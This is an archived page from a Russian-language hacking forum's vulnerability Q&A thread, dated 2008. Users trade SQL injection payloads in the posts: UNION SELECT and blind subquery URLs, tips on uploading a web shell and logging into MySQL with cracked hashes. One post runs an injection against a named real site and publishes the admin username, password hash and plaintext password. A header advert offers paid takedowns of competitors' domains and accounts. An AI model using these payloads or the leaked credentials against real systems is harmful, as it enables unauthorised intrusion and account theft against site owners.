УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 231 из 1393

231

Опции темы

Поиск в этой теме

Опции просмотра

#2301

12.06.2008, 16:25

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

уверен что это скуль..?)

Последний раз редактировалось sabe; 12.06.2008 в 22:17..

#2302

12.06.2008, 18:39

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Цитата:

Сообщение от n0ne

Велемир,

3. Если file_priv = 1, попробуй залить шелл одним из множества способов. Также если у тебя есть доступ к mysql.user, то можно попробовать расшифровать хэш и залогиница в базу, но стоит это делать при условии что доступ разрешен не только localhost, а это бывает достаточно редко

Я ж грю,что шелл не могу залить,ибо путь не знаю =_=.Хеши у мя есть,расшифровал не все,а как зайти в бд ниипу,ибо нету привычной мне phpmyadmin =________________________=.Порт открытый,как я уже сказал,есть - (3306).КАК и ЧЕМ залогиница я не знаю =_=,ибо никогда такого не делал.

#2303

12.06.2008, 18:44

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Так, ещё у меня проблемка с подзапросами(такой вот Веля нуп).По статье Scipio решил попробывать,и чота (а чо?!) не канает.Вот пример:

http://www.site.com/script.php?id=38+and+(select+1+from+users)=1/*

ЗЫ:В таблице 38 полей и я знаю,что таблица users существует, ибо сам из неё выбирал данные)).По идее,должно вернуть ту самую страницу с ид 38,но только без ошибки мускула =_=.Не бейте стульями и табуретками,просто очень нужно

#2304

12.06.2008, 20:02

Dima-k17

Познающий

Регистрация: 15.09.2005

Сообщений: 60

Провел на форуме:
254802

Репутация: 52

Отправить сообщение для Dima-k17 с помощью ICQ

2 Велемир
А если так?
http://www.site.com/script.php?id=38+and+substring((select+1+from+user s),1,1)=1/*
---
2 all.
У меня тоже вопросик.
http://www.site.com/aindex.cfm?part=2042513+and+1=1-- - выполняется
http://www.site.com/aindex.cfm?part=2042513+and+1=0-- - перебрасывает на страницу с ошибкой
http://www.site.com/aindex.cfm?part=2042513-1-- - выводит http://www.site.com/aindex.cfm?part=2042512
Как я понимаю тут MSSQL, но вот как его крутить в такой ситуации?

#2305

12.06.2008, 20:35

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

[QUOTE=Dima-k17]2 Велемир
А если так?
http://www.site.com/script.php?id=38+and+substring((select+1+from+user s),1,1)=1/*
---
QUOTE]

Не выходит чот))

http://www.a2k.org.ua/news.php?id=1978+and+substring((select+1+from+user s),1,1)=1/*

=))

#2306

12.06.2008, 21:12

groundhog

Познавший АНТИЧАТ

Регистрация: 12.05.2007

Сообщений: 1,235

Провел на форуме:
2238549

Репутация: 1318

Отправить сообщение для groundhog с помощью ICQ

Велемир, а я думаю, что табы users на хосте нету, ибо запрос:

Цитата:

http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+--

Даёт вывод, а запрос:

Цитата:

http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38+FROM+users--

завершается ошибкой...

#2307

12.06.2008, 21:27

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Ничё подобного,твой метод работает))),вот только вывода нету там =_=,потому и нужны подзапросы...

#2308

12.06.2008, 21:58

Jokester

Members of Antichat - Level 5

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Велемир
какие подзапросы?
_http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+u sers--
4.1.22-standard
d23d8b79f575bcc0eedfb8c4e2f13540
admin
Кстати незамысловатый пасс
admin:repz

Последний раз редактировалось jokester; 12.06.2008 в 22:07..

#2309

12.06.2008, 22:17

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

это Оракл?

Цитата:

http://blog.chosun.com/blog.screen?blogId=58155&menuId=252978'

как реализовать?)

#2310

12.06.2008, 22:21

l-l00K

Leaders of Antichat - Level 4

Регистрация: 26.11.2006

Сообщений: 237

Провел на форуме:
13395217

Репутация: 2097

там нет скули, ошибка в java

__________________
Не занимаюсь коммерцией в любых ее проявлениях.

Страница 231 из 1393

231

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход